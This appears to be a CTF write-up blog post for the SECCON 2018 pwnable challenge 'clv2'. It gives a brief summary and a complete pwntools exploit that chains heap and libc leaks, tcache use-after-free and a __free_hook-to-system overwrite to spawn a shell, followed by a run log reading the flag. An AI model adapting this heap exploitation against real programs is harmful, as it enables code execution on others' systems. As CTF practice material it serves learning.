Category : pwnable
CLV2 489 3 Solves Pwn me, and Prove yourself nc clv2.pwn.seccon.jp 31337 |
Summary : tcache, use after free
Exploit
#!/usr/bin/python
from pwn import *
def cmd_register(name):
ru('[E]xit\n')
sl('R')
ru('name?\n')
sl(name)
return rl(False).split(' ')[0]
def cmd_login(name):
ru('[E]xit\n')
sl('L')
ru('User : ')
sl(name)
def cmd_play():
ru('[E]xit\n')
sl('P')
def cmd_add_prov(method, word):
ru('[E]xit\n')
sl('A')
ru('words > ')
ss(word)
ru('[3]\n')
sl(str(method))
ru('...\n')
ru('Added!')
def cmd_show_prov(hint, All=False):
res = {}
ru('[E]xit\n')
sl('S')
ru('[N]o\n')
sl('Y')
if not All:
ru('Hint : ')
sl(str(hint))
t = rl(False)
t = t.split(' : ')
res = t[1]
else:
ru('Hint : ')
sl(str(0x1cafe))
while 1:
t = rl(False)
if '=================' in t:
break
t = t.split(' : ')
res[int(t[0])] = t[1]
return res
def cmd_del_prov(hint):
ru('[E]xit\n')
sl('D')
ru('Hint : ')
sl(str(hint))
ru('Deleted!\n')
def calc_hint(x):
t = sum(map(ord, x))
if t > 0x100:
return (t & 0xff) + 0x100
else:
return t
#s = process('./clv2')
s = remote('clv2.pwn.seccon.jp', 31337)
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send
cmd_register('pwn3r\x00\x00\x00'+'MAST=pwn3r\x00'.ljust(0x10, '\x00') * 0x23 + '\x88\x56')
#s.interactive()
#cmd_login('pwn3r')
cmd_play()
################ heap leak ##################
cmd_add_prov(2, 'B')
cmd_add_prov(2, 'A')
cmd_del_prov(ord('A'))
cmd_del_prov(ord('B'))
cmd_add_prov(2, 'C')
heap_base = u64(cmd_show_prov(ord('C')).ljust(8, '\x00')) - 0x500343
print hex(heap_base)
cmd_del_prov(ord('C'))
#############################################
################ libc leak ##################
for i in range(8):
cmd_add_prov(2, chr(0x17 - i).ljust(0x91, '\x01'))
for i in range(8):
cmd_del_prov(0xa0 + i)
cmd_add_prov(2, 'D')
cmd_add_prov(2, 'E')
cmd_add_prov(2, 'F')
libc_base = u64(cmd_show_prov(ord('F')).ljust(8, '\x00')) - 0x3ebd46 # libc_leak
libc_free_hook = libc_base + 0x3ed8e8
libc_system = libc_base + 0x4f440
print hex(libc_base)
cmd_del_prov(ord('F'))
cmd_del_prov(ord('E'))
cmd_del_prov(ord('D'))
#############################################
########## overwrite __free_hook ############
for i in range(0, 4):
cmd_add_prov(2, chr(0x24-i)*0x47) # pop from tcache
cmd_add_prov(2, '\x10' * 0x67)
fake_chunk = ''
fake_chunk += p64(0) * 4
fake_chunk += p64(0x1)
fake_chunk += p64(heap_base + 0x205b0)
fake_chunk += p64(8)
fake_chunk += p64(0) * 4 # padding
hint = sum(map(ord, fake_chunk))#calc_hint(fake_chunk)
tt = (0x565 - hint)
fake_chunk = chr(tt / 24) * 23 + chr(tt - (tt / 24) * 23) + fake_chunk[0x18:]
cmd_add_prov(2, fake_chunk)
cmd_add_prov(2, 'a')
cmd_del_prov(ord('a'))
fake_chunk_ptr = ''
fake_chunk_ptr += p64(0) * 4
fake_chunk_ptr += p64(ord('a'))
fake_chunk_ptr += p64(0) * 2
fake_chunk_ptr += p64(heap_base + 0x500840)
hint = sum(map(ord, fake_chunk_ptr))
tt = (0x464 - hint)
fake_chunk_ptr = chr(tt / 24) * 23 + chr(tt - (tt / 24) * 23) + fake_chunk_ptr[0x18:]
cmd_add_prov(2, fake_chunk_ptr)
cmd_add_prov(2, 'a')
cmd_del_prov(0x67 * 0x10)
cmd_del_prov(1)
# (0x50) tcache_entry[3]: 0x55c7c13905b0 --> 0x55c7c13905b0 (overlap chunk with 0x55c7c13905a0(freed) )
cmd_add_prov(2, p64(libc_free_hook).ljust(0x48-2, '\x01'))
cmd_add_prov(2, ''.ljust(0x48-2, '\x01'))
cmd_add_prov(2, p64(libc_system).ljust(0x48-2, '\x01'))
cmd_add_prov(2, 'sh;')
# cmd_del_prov
ru('[E]xit\n')
sl('D')
ru('Hint : ')
sl(str(sum(map(ord, 'sh;'))))
#############################################
s.interactive()
s.close()
$ while [ 1 ] ; do python pwn3r.py ; done
..................................
..................................
e 54, in recv_raw
raise EOFError
EOFError
[*] Closed connection to clv2.pwn.seccon.jp port 31337
[+] Opening connection to clv2.pwn.seccon.jp on port 31337: Done
0x55de14578000
0x7f4d2d589000
[*] Switching to interactive mode
$ id
uid=1001 gid=1001 groups=1001
$ cat /home/clv2/flag.txt
SECCON{??????????????????????????}
'CTF > 2018' 카테고리의 다른 글
| BCTF 2018 - easywasm (0) | 2018.12.06 |
|---|---|
| DEFCON CTF 2018 QUAL - EC3 (0) | 2018.12.03 |
| BCTF 2018 - houseOfAtum (0) | 2018.11.30 |
| SECCON CTF 2018 QUAL - secret_message (one shot exploit) (0) | 2018.11.25 |
| INCTF 2018 - lost (0) | 2018.11.04 |
